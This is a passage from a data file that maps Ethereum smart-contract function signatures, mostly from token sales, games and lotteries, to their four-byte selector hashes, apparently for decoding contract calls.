"ASTRN_TOKEN()": "0xf6f65f1a", "buyMicroKeysWithHandle(string,string)": "0xd1110c5f", "registerHandle(string)": "0xb61386fb", "addressToBlock(address[],bool)": "0x94b44f3e", "addressToPass(address[],bool)": "0xb57874ce", "OuterContract()": "0xa448f8e0", "whatsMyName()": "0xcf5713b6", "innerContract()": "0x5de40f30", "WorldWideLoveToken()": "0x4c66bcc1", "SESAPACToken()": "0x65781994", "TMONEY272708()": "0x497cd327", "PRVTToken(uint256,string,uint8,string)": "0xb828cfd2", "provideInfoCourseBaseOnIdStudent(uint256)": "0x1d814480", "CourseBaseOnIdStudentFunct(uint256)": "0xe611ad32", "FindCourseBaseOnIdStudent(uint256)": "0xd3c41dae", "clearAllRequest()": "0x67551857", "rejectCertificate(uint256,uint256)": "0x974a832d", "approveCertificate(uint256,uint256)": "0x9e0b7a1c", "provideCertificate(uint256,uint256)": "0x2e478dd8", "getStudent()": "0xb439548d", "applyForCandidate(string,uint256,string,string,string,uint256,bool)": "0x400351cb", "getCoursesCount()": "0x1dcdf215", "AddNewCourse(string,string,string,string)": "0x97ff335b", "AddStudent()": "0x38dca34a", "Hashfex()": "0x4dbb51f6", "Leonardo()": "0xeb5392ff", "unFrozen(address)": "0x5816ba9d", "changeYUMOAddress(address)": "0xc1f06e89", "changeYUMAddress(address,address)": "0x7b4b5e4e", "Lirux(string,string,uint256,string)": "0x7a93b917", "SOVv11Token()": "0xec88abc8", "clearAllrequest()": "0x8dbb908a", "rejectCertificate(uint256)": "0x1f97a238", "approveCertificate(uint256)": "0xf4025568", "numStudentRequest()": "0xa61c5b82", "applyForCertification(string,string,string,uint256,bool)": "0x4033cd77", "numCourse()": "0xa327a958", "addCourse(string,uint256,uint256,uint256,string)": "0x043cf01a", "BRTToken()": "0xfa01dd3c", "RealMoneyToken()": "0x5f0fc2e8", "MESH(uint256)": "0x83ea5111", "victorieumStaticToken()": "0x55e6b18e", "tbitfwdToken()": "0x422d3374", "setContributor(address,address,bool,uint8,uint8,address)": "0xe673f646", "setTokenRateInGwei(uint256)": "0x723e435f", "runPreMint(address,uint256)": "0xaf8ff2f8", "preMint(address,uint256)": "0x290c292d", "FFUELCoinTokenCrowdSale(uint256,uint256,uint256,uint256,uint256,address,address,address,address,address,uint256)": "0x6d2d525d", "StoreProduct(bytes32,bytes1)": "0x21b6c321", "AGCoin()": "0xebcfd89e", "placeBet(uint256,uint256,uint256)": "0xe71c9697", "getRespectiveValue(address)": "0x92b9308c", "setExchangeGroup(address,uint256)": "0x4c266e11", "validateInvestmentGroups(address[])": "0x2408771e", "NewStandardToken(uint256,string,uint8,string)": "0x53e7daf2", "distruggi()": "0x1cafc144", "DaleOR()": "0x7695be1d", "campaignCaptain(uint256)": "0x1d3f864b", "_updateSpaceshipPrice(uint256)": "0xf9a42b8b", "addSystemUserEarnings(uint256)": "0x35765828", "addSpaceshipMoney(uint256,uint256,uint256)": "0x8511b843", "addMoonPrizePool(uint256,uint256)": "0xc913f364", "updateGameMoney(uint256,uint256,uint256,uint256)": "0xaa656a3a", "getFhMoney(uint256,uint256,uint256,uint256)": "0x38759ce9", "buyTicket(uint256,uint256,string)": "0x1d6916ab", "checkNewPlayer(address)": "0x1aacd03c", "checkTicket(uint256,uint256)": "0x4fe2e15a", "checkName(string)": "0x1400d1e4", "getSpaceship(uint256)": "0xc964e493", "setFreeMem()": "0xb5160d6f", "lilitoken()": "0xb0fc9bdf", "GetCurrentBonusStageTokenBalance()": "0x21554dca", "balanceEthOf(address)": "0x7a6a00bb", "tokensToEth(uint256,uint256)": "0x31d6183b", "getStageBonus()": "0x15dc806e", "nextStageBonus()": "0xf216f45d", "areNoncesValid(bytes,uint64[],uint64[])": "0xe6f9f265", "registerPoA(string,bytes32,uint64[],uint64[],address,address,string,bytes2)": "0xd5bde837", "createCampaign(string,uint256[3],uint256[],uint256,uint256,uint256,uint256)": "0x8f88b792", "getAdvertisementStorageAddress()": "0x74418368", "buyRank(uint256)": "0x33575f64", "buyNextRank()": "0xcc537821", "BONES()": "0x26591e79", "STC()": "0x542e898e", "InfiCoin()": "0x91324514", "kkkTokenSale(uint256,address)": "0x2554b9b3", "currentStateToString()": "0x2e66ee1b", "startPhase2()": "0xfcb5bc29", "startPhase1()": "0xa44081d1", "mintFounderTokens()": "0x76b63576", "checkKingFounder(address)": "0xa2d1c624", "VBToken()": "0xba33a876", "LC(uint256,string,string)": "0x2bcf300e", "CAIRToken()": "0x0124188d", "ReiDoCoinToken()": "0x5c469570", "CryptovationX(address)": "0x103cfacf", "updateSaleTime(uint256,uint256)": "0xccc643d7", "getBonustokens(uint256)": "0x741e3576", "SMRTCoin()": "0xff09068f", "updateIncentiveTokenLimit(uint256)": "0xc5e98a4c", "updateBusinessReserveAddress(address)": "0x1fafc2c8", "updateTimeLock(uint256)": "0x30e9c341", "SuperEdge()": "0xeaf4438f", "Blammascoin()": "0xc93dd31a", "TokensWorldCoin()": "0xf7477435", "XENCToken()": "0x18718656", "BENEFITToken(uint256,uint256,uint256,uint256,uint256)": "0xe36c3f70", "getAllowedForTransferTokens(address)": "0x25f5cb1e", "icoInvestment(address,uint256,uint256)": "0x18a8fac9", "bonusBalanceOf(address)": "0x68654ef8", "getBonusUnlockAt()": "0x38909b68", "setBonusUnlockAt(uint256)": "0xc95c0efd", "BaseICOTokenWithBonus(uint256)": "0xd8fe1558", "EthLyte()": "0x5451436d", "do_redemption()": "0x10059be0", "calculate_minimum_contribution()": "0x2c035157", "SharkPool()": "0xe355cd4a", "distribute_reward(uint256,uint256)": "0xe499f542", "get_bitcoineum_contract_address()": "0xb8b0f533", "available_slots()": "0x54ba34b5", "allocate_slot(address)": "0xdac9555d", "find_contribution(address)": "0xa263601c", "set_pool_percentage(uint8)": "0xe6d2ceab", "currentDifficultyWei()": "0xb0c2a163", "addPrecommitment(address,uint256,bool)": "0x3e5b5e39", "verifyKYC(address)": "0x38d16011", "releaseLock(address)": "0xd1c46916", "releaseLockFoundation()": "0x3888188d", "releaseLockFounders2()": "0x6a4113c7", "releaseLockFounders1()": "0x09d929d6", "setStartTime(uint64)": "0x38812e58", "removeVerifier(address,address)": "0x7b3fdcd8", "addVerifier(address,address)": "0x245ba519", "SelfKeyCrowdsale(uint64,uint64,uint256)": "0x24992680", "SelfKeyToken(uint256)": "0x26b3a6f8", "WhiteWallToken()": "0x59462295", "QMQCoin()": "0x30aa311a", "getWithdrawSum()": "0x9fb95205", "getInvestSum()": "0x0b5e19b0", "sellMyTokens(uint256)": "0x0e92eb6d", "TASOHATOKEN(uint256,string,string)": "0xaee83b61", "LCT()": "0x6d37a9dc", "Champion()": "0x8937d3dd", "setSellCommissionBps(uint256)": "0x59d89175", "setBuyCommissionBps(uint256)": "0x06cc01bc", "getLastPriceFeedValues()": "0xabd74e52", "addPriceFeed(uint256,uint256,uint256,uint256,bytes)": "0x53aab098", "viewScore(address)": "0xdb230b52", "getKebabsSincelastKebab(address)": "0xf2393d55", "getMyKebabs()": "0x3c49ec88", "getMyKebabers()": "0xcb8c2982", "getFreeKebaber()": "0xa2b8891e", "calculateKebabBuySimple(uint256)": "0xb32022e8", "calculateKebabBuy(uint256,uint256)": "0x6ffb341e", "calculateKebabSell(uint256)": "0x5069a6a6", "buyKebabs()": "0xfb8e7870", "sellKebabs()": "0xd836f794", "makeKebabs(address)": "0xa40fbd2b", "isOpened()": "0x692aa97e", "withdrawalFunds(bool)": "0xfb2e0078", "refundByOwner(address)": "0xc3508d58", "claimMyApis()": "0xf01eddda", "claimApis(address)": "0x5a297cae", "buyToken(address)": "0x7e72fb52", "isClaimable(address)": "0x292fec04", "whiteListOf(address)": "0x44e2651c", "setCurrentFundingGoal(uint256)": "0xe3d2a98c", "setPriceOfApis(uint256)": "0x4dcd85d8", "closeSale(bool)": "0x391714f8", "ApisCrowdSale(uint256,uint256,uint256,address,address,address,address)": "0x0d66a3ec", "isMeInWhiteList()": "0x405665fb", "addWhiteBackersByList(address[])": "0x766b0823", "setWhiteBackersByList(address[],bool[])": "0xd0f89c6d", "addWhiteBacker(address)": "0xe30f4f84", "setWhiteBacker(address,bool)": "0x48636254", "transferAndLockForever(address,uint256)": "0x6a59d0a4", "transferAndLockUntil(address,uint256,uint256)": "0x85d544be", "registerManoContract(address,bool)": "0x7cf846c9", "isMyWalletLocked_Receive()": "0xe374e8d4", "isMyWalletLocked_Send()": "0xfbcc3775", "getBackBNB()": "0x7764f771", "getBack()": "0x7eae1626", "sendTokenToMultiAddr(address[],uint256[])": "0xccd95a50", "QPSEToken()": "0x39fd2003", "Atra()": "0x6f322fef", "AtraOwner()": "0x0a1e7701", "transferComplete(address,uint256,bytes)": "0x4c2d8649", "getTXSValue(uint256)": "0x1481c04a", "getTXSAddress(uint256)": "0xa5731c1c", "registerTXS(uint256,address)": "0xbf506b47", "initDeposit(uint256)": "0x4d8dcc7a", "RCCContractTest()": "0x65e7ee50", "prizeDeposit()": "0x9a0f1561", "requestTokens(uint256)": "0xeef9c27c", "_requestTokens(address,uint256)": "0xcea5033c", "_redeem(address,uint256)": "0x4dfad511", "HFCoin(string,string)": "0xf48f3ced", "NyronChain_Crowdsale()": "0x5d989a0c", "LXKToken()": "0x3b4fb68f", "withdrawTokenFromTAR(address,uint256)": "0xfe73f74c", "finishICO(address,address,address)": "0xb0732278", "setCrowdsaleStart(uint256)": "0xf383c7b3", "setPresaleStart(uint256)": "0x78152bbe", "TestRobotarCrowdsale()": "0xe9de78fd", "supplyBezNolei()": "0xd60e1447", "defrost()": "0xf21cdf6f", "RobotarTestToken(address)": "0x2d658888", "SECoin(uint256,string,string)": "0x568f7830", "SimpleAquaPriceOracle(uint256,uint256)": "0xbb6f175f", "TRIUM(uint256,string,string)": "0x6464b107", "setRealRef(address,uint256)": "0xa42ecd5c", "setAquaman(address)": "0x61725795", "setSuperman(address)": "0xb6c47da1", "setBatman(address)": "0x293f3fa9", "BatCave()": "0xaa1c31a3", "Suren3Token()": "0xe6e84bf8", "PalestinePound()": "0x56240b38", "setIcoEndTime(uint256)": "0xfe3c9b6b", "claimTeamToken()": "0x9d421ea7", "claimCompanyReserve()": "0x2a8d7baa", "GCToken()": "0x616d50c3", "AntmineToken()": "0xe439501e", "Redicon()": "0xa023d4a7", "airdropExecute(address,address[],uint256)": "0xf9e73764", "LeeroyPremiumToken()": "0x6f893e0d", "FTC()": "0x91613e4b", "getStockShares(uint256)": "0x2deb79b6", "getStockCount()": "0xdc08e5ff", "getDividendPayout(uint256,uint256,uint256)": "0x269aacc8", "getPurchasePrice(uint256,uint256)": "0x4f5d06c2", "getCurrentPrice(uint256,uint256)": "0x04673368", "addStock(string,uint256,uint256,uint256,uint8)": "0xe079e7e5", "EBIT()": "0xea596a34", "FSM()": "0x49d596fe", "XGEToken()": "0x1b073c67", "fundingState()": "0xb25cdccf", "PartialFundsTransfer(uint256)": "0x42af2478", "FundsTransfer()": "0x42bb5709", "setBonusCreationRate(uint256)": "0x41d003cb", "createDaoPOLSKAtokens(address)": "0xc0a1e525", "sendTokenAw(address,address,uint256)": "0x6d57dee4", "DAOPolskaTokenICOregulations()": "0x5d5c606f", "setChainsAddresses(address,int256)": "0xfbf7980f", "setotherchainstotalsupply(uint256)": "0x26f08aec", "daoPOLSKAtokens()": "0xcaccd805", "PXP()": "0x79f119cd", "TRONIXGOLD()": "0x381a0161", "WifiBonusCoin()": "0x6a5cf2d0", "CrowdWithUs(uint256,string,address,uint256)": "0x5ad871d5", "currentRoundParameters()": "0x098e349a", "roundParameters(uint256)": "0x3e6f4160", "isCrowdsaleAllowed()": "0xb028d73a", "coachTakeOff(uint256)": "0x2bff5630", "setCoachPrice(uint256,uint256)": "0xf33801e0", "drawCoach(uint256,address,address)": "0x1fda8278", "initialCoach(uint256,uint256,uint8,uint256)": "0x13a19e1b", "getAmountOrdersForDay(uint256)": "0xc6d779e6", "getOrderAddressesForDay(uint256)": "0x38a003e0", "burnSoupTokensForDay(uint256)": "0x9077309b", "orderForDays(bool[])": "0x3c9340ae", "findOrderIndexForAddress(uint256,address)": "0x03347d75", "checkIfAlreadyOrderedForDay(uint256,address)": "0xc477d234", "SoupToken(string,string)": "0xe9cfb399", "Kapitalexote()": "0xec23ba66", "launchGame()": "0x295f6ce7", "isTrainer(address)": "0x50beca78", "moveToArea(uint16)": "0x25c70a44", "changeMonsterNickname(uint256,string)": "0x3aac7661", "changeUsername(string)": "0x77c846af", "createTrainer(string,uint16)": "0x9b132392", "createArea()": "0x16754c55", "spawnMonster(uint256,address)": "0xe95015b9", "evolveMonster(uint256,uint16)": "0x75872a5a", "setOmegaContract(address)": "0xbba45738", "setGameLogicContract(address)": "0x97fce1bb", "ChainMonstersCore()": "0x2a295c1f", "OmegaContract()": "0xdfc42f7c", "GameLogicContract()": "0x8c7c4016", "getGen0IVs()": "0x342ba8de", "getMonsterIVs()": "0xa3848b1a", "getSellValue(uint256)": "0x7939a10b", "getBuyCost(uint256)": "0x0ae66820", "amountForSale()": "0x8473e55f", "TeikhosBounty()": "0xf9b07b9b", "pank15()": "0xa65465ff", "batchDistribute(address[],uint256)": "0xf7701ce8", "setTimedTransfer(uint256,uint256)": "0xac7709bc", "transferCheck(address,address,uint256)": "0xc76668cf", "tokenFactory(uint256)": "0x5f2ef12d", "tokenMinter(uint256)": "0x7c57d947", "tokenBurner(uint256)": "0x8b1cc4f4", "thawTokenTransfers()": "0x421ae949", "freezeTokenTransfers()": "0xde8b888e", "enableTokenMinting()": "0x27458664", "disableTokenMinting()": "0xa924ee60", "launchContract()": "0x19d45a08", "transactionReplay(address,uint256)": "0x30d68214", "TKP()": "0xc42e1ace", "configSale(uint256,uint256,uint256,uint256)": "0x008000d6", "zHQPreSale()": "0xcd5b4ae0", "Crowdsale(uint256,uint256,uint256)": "0x386ee512", "withdrawRoundController(uint256,address)": "0xcc865b71", "withdrawRound(uint256)": "0x59667c24", "changeWithdrawableRound(uint256)": "0x65a096dc", "removeNacFromNLF(uint256)": "0x89af049d", "addNacToNLF(uint256)": "0xa6f55282", "withdrawSubRound(uint256)": "0xcd897b75", "closeDepositSubRound()": "0x9d0cfc2c", "withdrawFromSubRound(uint256)": "0x0b697362", "depositToSubRound(uint256)": "0xb8cc3c12", "activateSubRound(uint256)": "0xf80bb2a7", "deactivateRound(uint256)": "0xf1625534", "activateRound(uint256)": "0x14743e7e", "withdrawNacNetfRe(uint256)": "0xa8ddefab", "withdrawNacNetfReController(uint256,address)": "0xc36981f4", "changeWithdrawableNetfRe(uint256)": "0xfac3a4db", "latchFciUser(uint256)": "0xed5d2289", "latchFciUserController(uint256,address)": "0x6be47418", "latchTotalFci(uint256)": "0xf9a8b0ba", "withdrawNetfRevenue(uint256)": "0x00e4fc14", "depositNetfRevenue(uint256)": "0xc7a9a64b", "openNetfRevenueRound(uint256)": "0x33158ba4", "sellFci(address,uint256)": "0x6b2ed1c0", "placeSellFciOrder(uint256)": "0xc3a74e6a", "buyFci(address,uint256)": "0xeb3087bf", "updatePriceFci(uint256,uint256)": "0x3176d373", "changePause()": "0xc3defb70", "removeNacFromNetf(uint256)": "0x4b1fb6d4", "addNacToNetf(uint256)": "0x91aac477", "withdrawNac(uint256)": "0x12818f0c", "changeMaxWithdraw(uint256)": "0x26e5ab38", "changeMinWithdraw(uint256)": "0xcc61d0cb", "changeMinNac(uint256)": "0x726b23bf", "getSpaceshipTotalSold()": "0x0355b70a", "getSpaceshipProductCount()": "0x11746e5e", "getSpaceshipProductAttributesByModel(uint16)": "0x8635f45d", "getSpaceshipProductTotalSoldByModel(uint16)": "0xd66495cd", "getSpaceshipProductClassByModel(uint16)": "0xdb5cf9de", "getSpaceshipProductPriceByModel(uint16)": "0x97cb2c17", "getPlayerSpaceshipUpgradesById(uint256)": "0x718df9d7", "getPlayerSpaceships(address)": "0xbe7385e3", "getPlayerSpaceshipBattleLossesById(uint256)": "0x6666490c", "getPlayerSpaceshipBattleWinsById(uint256)": "0x9e60f8d6", "getPlayerSpaceshipBattleLevelById(uint256)": "0x895274bb", "getPlayerSpaceshipBattleStakeById(uint256)": "0x6caf3673", "getPlayerSpaceshipBattleStakePaidById(uint256)": "0x1dd80586", "getPlayerSpaceshipBattleModeById(uint256)": "0xcb7a0a6f", "getPlayerSpaceshipAuctionPriceById(uint256)": "0x6de996b4", "getPlayerSpaceshipAuctionById(uint256)": "0x6df0b557", "getPlayerSpaceshipModelByIndex(address,uint256)": "0x1c7f6942", "getPlayerSpaceshipOwnerById(uint256)": "0x89065e9a", "getPlayerSpaceshipModelById(uint256)": "0xdfb30c14", "getPlayerSpaceshipCount(address)": "0xe6c28db4", "buySpaceshipUpgrade(uint256,uint16,uint8)": "0xb9e01aeb", "battle(uint256,uint256)": "0x2a0c5221", "battleRemove(uint256)": "0x21f1a18c", "battleAdd(uint256)": "0xf837e7c1", "bidSpaceship(uint256)": "0xb0e667a9", "sellSpaceship(uint256,uint256)": "0x276927c5", "_generateSpaceship(uint16,address)": "0xd597c6bb", "buySpaceship(uint16)": "0x7cdee6fb", "_newSpaceshipProduct(uint16,bytes2,bytes2,bytes2,bytes2,uint256)": "0xb08496dd", "giftSpaceship(uint16,address)": "0x6b95767d", "setBattleContract(address,address)": "0x04f80977", "setUpgradeContract(address,address)": "0xd7787f33", "setBattleFee(uint256)": "0x9493ac07", "newSpaceshipProduct(uint16,bytes2,bytes2,bytes2,bytes2,uint256)": "0x147da3c9", "setSpaceshipPrice(uint16,uint256)": "0xd9c3193d", "ids()": "0xe7657e15", "_setBattleContract(address,address)": "0xb9da8360", "_setUpgradeContract(address,address)": "0x587b060e", "newSpaceshipUpgrade(bytes1,uint8,uint256)": "0x3f4f070c", "getSpaceshipUpgradeCount()": "0x23d5a686", "getSpaceshipUpgradeTotalSoldByModel(uint16,uint8)": "0xb29b3511", "getSpaceshipUpgradePriceByModel(uint16,uint8)": "0x7d49e51d", "buySpaceshipUpgrade(bytes5,uint16,uint8)": "0xbc22df1a", "isSpaceshipUpgradeAllowed(bytes5,uint16,uint8)": "0xd5e05c89", "isEtherSpaceUpgrade()": "0xa9ccc3af", "calculateLevel(bytes8,bytes5)": "0xd93dbeff", "calculateStake(bytes8,bytes5)": "0x3050caa4", "getTargetReportsPerLimitedReporterMarket()": "0x839b913e", "getDisputeEndTime()": "0x6fc65924", "getDisputeStartTime()": "0x3869416b", "getReportingEndTime()": "0x992e2a16", "getReportingStartTime()": "0xb66e7524", "getRegistrationToken()": "0x77810380", "toUINT128(uint256)": "0x60c2f663", "toUINT120(uint256)": "0x872f5459", "toUINT112(uint256)": "0xbb90617b", "_transfer(address,address,uint256,bytes)": "0xfa6bdbf8", "NutzEnabled(address,address)": "0x41031b1d", "GERCoinCrowdsale(uint256,uint256,uint256,address)": "0x5aa3952a", "MultiOwnable()": "0xd12e0b2a", "HasDelegateAuthority()": "0xeb1f9c78", "ConsentDirective(address,uint256)": "0xdddd3594", "SetWhat(uint256)": "0x183d255e", "GetTheWho()": "0x29638eee", "SetWho(address)": "0x739d3307", "Category(string)": "0x44fb5a1a", "GetAllConsentData()": "0xb6f7600d", "AddConsentData(uint256)": "0x488a6705", "GetConsentDataCount()": "0x7028b3b9", "GetConsentData(uint256)": "0xc70a9246", "SetCategoryName(string)": "0x0fa803e8", "unlockCashpledge(bytes32)": "0xe7fa443e", "arbitrate(address,address,bytes32,bool)": "0xc4426a88", "askArbitrator(address,bytes32)": "0x75b975b7", "quitArbitrator()": "0x0827940f", "beArbitrator()": "0x377002fb", "withdrawPledge()": "0x1209f7ed", "endPtopDeposit(address,address,bytes32)": "0x5d355804", "startPtopDeposit(address,address,bytes32,uint256,uint256)": "0x63e49fcd", "Bilateral()": "0xa573a9f4", "debugBuy()": "0xb1f56187", "finalizeSale()": "0x58a687ec", "sendETHToMultiSig(uint256)": "0xbc6171df", "setHaltSale(bool)": "0x62aac84d", "publicSaleStarted()": "0xa2e91477", "saleStarted()": "0x5c474f9e", "eligibleTestAndIncrement(address,uint256)": "0x2effbada", "eligible(address,uint256)": "0x32b182c3", "contributorCap(address)": "0x442085b2", "getCap(address)": "0xb3aefb75", "setSale(address)": "0x36af50fd", "accept(address,uint256)": "0xcd67571c", "Whitelist(address,address)": "0x906860d9", "CryptoGripInitiative(uint256,uint256,uint256,address)": "0x163c4e3c", "reservationFromBackend(uint256,bytes32,address,uint256,uint256)": "0x83d7529f", "reservationFromEthereum(address,uint256,uint256)": "0x162e2f6c", "add(bytes32,bytes32,uint256)": "0x91ea8a05", "EstimateGas()": "0xd1d6d639", "testPrivacy()": "0x5ecc33ac", "calcFib(uint256)": "0xa4262254", "getNewFib(uint256)": "0x1e0f9795", "getStoredFib()": "0x8bae2a03", "DAOBalanceSnapShot()": "0x5d8e7376", "Lockup(address)": "0x9cb230ec", "setCurrentRewardTokens()": "0xece2064c", "depositETH()": "0xf6326fb3", "trustedWithdrawETH(address,uint256)": "0x20283da9", "trustedBurnTokens(uint256)": "0xc7ee98c2", "trustedTransferTokens(address,uint256)": "0xe7a49c2b", "createReward(uint256,uint256)": "0x7dbedad5", "SIT(address)": "0x53bc373d", "spendDeposit(address,address,uint256)": "0x04a79e9a", "receiveSpendingDeposit(address,uint256)": "0x0a16605e", "getProvider(address)": "0x55f21eb7", "getCondition(uint256)": "0x7bf212f8", "getDefinition(uint256)": "0xd681ffa7", "getMerchandise(uint256)": "0xc705a1a8", "getVoucher()": "0x17f46c15", "redeemFrom(address,uint256,string)": "0xdd41e1c7", "approvePromise(address)": "0x911eb255", "addPromise(uint256)": "0x84644ec9", "deleteProvider(address)": "0x56b15308", "approveProvider(address)": "0x7a28399b", "applyAsProvider(string,string,string,string)": "0x240ad8bd", "writeConditions(uint256,string)": "0x208e1cc3", "writeDefinitions(uint256,string)": "0xf1daa1f0", "writeMerchandises(uint256,string)": "0x243056d6", "initializeToken(string,uint256,uint256)": "0x79a6877f", "linkContract(address)": "0xd271900d", "ricardianVoucher()": "0xfd842125", "calcETCtoCOR(uint256)": "0xee0145f3", "calcCORtoETC(uint256)": "0x3cb960a6", "setExchangeRateShift(uint256)": "0x1594afd1", "setFoundationAddress(address)": "0xf41377ca", "setMaxReceiveEther(uint256)": "0x77826b0c", "setCORAddress(address)": "0x8d08eefa", "getCOR()": "0xdbbfcd7c", "approvedToken(address,uint256,bytes)": "0x63542c26", "receiveToken(address,uint256,bytes)": "0xe418f592", "exchange(address,address,uint256,uint256)": "0x0ed2fc95", "setGatewayB(address)": "0x83c75ed5", "setGatewayI(address)": "0xf0e4c4fe", "timeboundTest(address,uint256,uint256)": "0x3f95c0c2", "complexScaleObsTest(address)": "0xdb2c4e2d", "simpleTest(address)": "0x138bdf1b", "deleteFincontract(bytes32)": "0x2d2e3bb2", "executeOr(bytes32,bool)": "0x9f58d881", "nftAddress()": "0x5bf8633a", "getSaleStart()": "0x969235a4", "wuxiaMaster()": "0xaaa77f55", "maxPlayerNum()": "0x10802749", "physicalString()": "0x5672f548", "fundariaTokenBuyAddress()": "0x280a3382", "offsetIndex()": "0xffe90ba6", "SendBid()": "0xae01c14f", "timeEnd()": "0xfda263e8", "collectedCent()": "0xada6b1d9", "preSaleLimit()": "0x909d6877", "castleMinBrick()": "0x4a3d3c09", "DGDIssued()": "0xf27ae77d", "productsShipped()": "0x65ddf33b", "bidfailure()": "0xee2d2490", "playerProfit()": "0xedfea70c", "totalRate()": "0x42a66f68", "VKNToEth()": "0x0ee2ce58", "proposalNonce()": "0xcc3c74a1", "artHash()": "0x4f33a013", "nameRegistry()": "0x4eb7221a", "feeHoldingAddress()": "0x9a507d9b", "majorOwnerShares()": "0xe2c7f7ae", "PRE_ICO_BONUS_PERCENTAGE()": "0xec62b216", "ILFManager()": "0xc0ff3ebc", "tokenRate1()": "0x10549874", "EGGS_TO_HATCH_1DINO()": "0x820c815e", "MAX_ETH_FUND()": "0x43dbb2de", "getEthereumToken()": "0x277d4725", "expectedRateContract()": "0x5dada964", "amountPerDay()": "0xe29e1345", "VULCAN_PROMETHEUS_FTL_SPEED()": "0xa7ee323e", "reservedForFounders()": "0xb256b093", "totalSencCollected()": "0x3422f709", "failSafeLimit()": "0x23dc1314", "params()": "0xcff0ab96", "unPausePriceRaise()": "0x4c0ee2e1", "FOUNDER_FUND_1()": "0x8be7f4f5", "conclude()": "0xe5f92973", "TYPE_NOT_AVAILABLE()": "0x9689ac95", "maxWei()": "0x068b7310", "sameNum()": "0xd47cc085", "InitialSettings()": "0xae8a6833", "addressAirdrop()": "0xf0fbe2e4", "sameOdd()": "0x97365df2", "MINER_STARTING_PRICE()": "0x7637da03", "whitelistAgent()": "0xdfd80665", "addressFundPlatform()": "0x8da87ac6", "supplyRound2()": "0x5d183b60", "nextPayoutBlock()": "0xb1ce0a9b", "SFT_PER_ETH_FIRST_EARLY_BIRD_RATE()": "0x62751a06", "charitySpaceToken()": "0xed6be066", "privSaled()": "0x6207d239", "COIN_SUPPLY_ICO_TIER_2()": "0xdf4aaf04", "tos()": "0x89f395de", "totalTrading()": "0x4cc6083a", "etherPerMiner()": "0xbc3abbdb", "ico_enddate()": "0x86f7313d", "miningThreePlat()": "0x3bf3d531", "periodByDate()": "0x2e0b1834", "NUM_OF_PHASE()": "0xdbefe789", "waveCap3()": "0xdc904e69", "unlockedBalance()": "0xab6ad452", "updateFlag()": "0x3a7104d1", "maximumClaimPriceWei()": "0x7c9b387b", "DATE_31_DEC_2022()": "0xb056561a", "extendedTokenCap()": "0x5003efca", "stageICO()": "0xa70b015d", "bonusAmtThreshold()": "0xa106f0bf", "lastPricePaid()": "0x4777338c", "universalToken()": "0xe99d2db4", "freeToUseTokens()": "0xecd27189", "grandTotalClaimed()": "0x9377530f", "BIDDING_DURATION()": "0x00a0190e", "ACTION_TAX()": "0x981ae401", "raisePreSale()": "0x3ccf127e", "bountyAdded()": "0x751318f4", "UnionChainSupply()": "0x1c6debbb", "affiliatThreshold4()": "0x36054f51", "communityFund()": "0x00f380f4", "firstReleaseAmount()": "0x9ea2104d", "PAYOUT_TIME()": "0x84c6f650", "maxPayments()": "0x81fab567", "SECONDS_BETWEEN_ROUNDS()": "0x413f7d4c", "maxSpendToken()": "0xa9d48032", "STAGE_PRESALE_ETHRaised()": "0x9f165304", "MAX_ALLOWED_STAGE_3()": "0xe0e722b7", "teamTwoSharePrice()": "0x41240314", "getTotalAmountOfBlocks()": "0x455f1725", "currentlyReleased()": "0x4e6d35ea", "token_airdrop_cnt_max()": "0xc24a8908", "minor_partner_address()": "0x8f272c0b", "winnerBidder()": "0xb5e221c1", "bittToken()": "0xee9c087a", "totalPhase1Donations()": "0xb32dc51c", "numDonations()": "0x5e9a1849", "bonusScheme()": "0x957a6254", "usedResidualAmount()": "0xa4fda741", "assignedSupply()": "0xb1efeece", "bountyAccount()": "0x13174093", "Tix()": "0x0e1e56f7", "normikaivo()": "0x99540fe0", "setTokensPerEther(uint256,uint256)": "0xd256c7a5", "AlphaMarketCoinExchanger(address[],address)": "0xf9ea8839", "cardOwnerOf(uint256)": "0x0d8814ae", "_calculatePaymentToOwner(uint256)": "0x4caa1a09", "CancelSell(uint256)": "0x87df4838", "getMyCards(address)": "0x37983aed", "createCard(uint256,uint256)": "0x110506f0", "initCards(uint256)": "0x71270b46", "CryptoHearthStone()": "0xc317464d", "SealCrowdsale()": "0x319f7700", "BITBIX()": "0xefff718d", "orderOnSaleAuction(uint256)": "0xe86142b5", "getCurrentPrice(uint256,uint256,uint8)": "0xa536dbe8", "_calculateDayPass()": "0xd1b33afa", "_order(uint256,uint256,uint8)": "0x85fbdd47", "getHeroItems(uint256)": "0x25fb66b9", "ownerIndexToERC20Balance(address,address)": "0x7a63626c", "transferFromOrigin(address,uint256)": "0x5c6bcad4", "GodzSwapGodzEther(address,address,address)": "0xaff7fae4", "BitcoinCashPrivate()": "0x8bd7920d", "Token(address,uint256,string,string,uint8)": "0x47b6ab59", "DIPToken()": "0x64f67f33", "wphcToken()": "0x0b9f1e76", "BitcoinSamaritan()": "0x227fda27", "unLockFreeze(uint256)": "0x11db0176", "KEO()": "0x25ccf688", "ownerYHT()": "0x50248cd1", "GLAM()": "0x92f53757", "BuyTokens(uint256)": "0x89749adb", "setSellPrices(uint256)": "0xaf7d0eff", "setAllowSell(bool)": "0xd373507b", "setBuyPrices(uint256)": "0xcdc25845", "setAllowBuy(bool)": "0xd6046836", "CBS(string,string,uint8,uint256,uint256,uint256,bool,bool)": "0x2b73a83b", "transferByInternal(address,address,uint256)": "0xcd639e8c", "setConfiguration(uint256,uint256,int256)": "0x88fd35e8", "initLottery(uint256,uint256,uint256,uint256,int256)": "0x101e1f2c", "administrate(uint256)": "0x94081387", "finalizeLottery(uint256)": "0xea7f7a59", "needsFinalization()": "0xbca7e96b", "initLottery(uint256,uint256,uint256,int256)": "0xb105126f", "WTO()": "0x85bb821b", "PayJackpot()": "0x1b3b5742", "GetMaxBuyIn()": "0x265028c2", "GetJackpotMin()": "0xc073af55", "createTeamTokens()": "0x67cf7d9c", "SDR(uint256,string,string)": "0x88e854e0", "setWeiPerSatoshi(uint256)": "0xecbdee9b", "getWeiPerSatoshi()": "0x14b933e1", "calculateDispensedTokensForGasPrice(uint256)": "0xe8c28358", "dispense(address)": "0x5f746233", "VOISE()": "0xfad88be7", "changeClient(address)": "0x8c0ec0d1", "execCustom(address,bytes,uint256,uint256)": "0xba9130a6", "updateIncrease(uint256)": "0xa52c9efd", "overwrite(string,string)": "0x66905ba0", "getIncrease()": "0x4627de42", "getRichest()": "0x9a5dd735", "buy(string,string)": "0xc63e529b", "LuckChain()": "0xafb2032b", "setICOStatus(bool)": "0x9dc27fe3", "getIcoTokensSold()": "0xbe802f05", "getPreSaleTokensSold()": "0x540cc484", "getTotalTokensSold()": "0x94c33163", 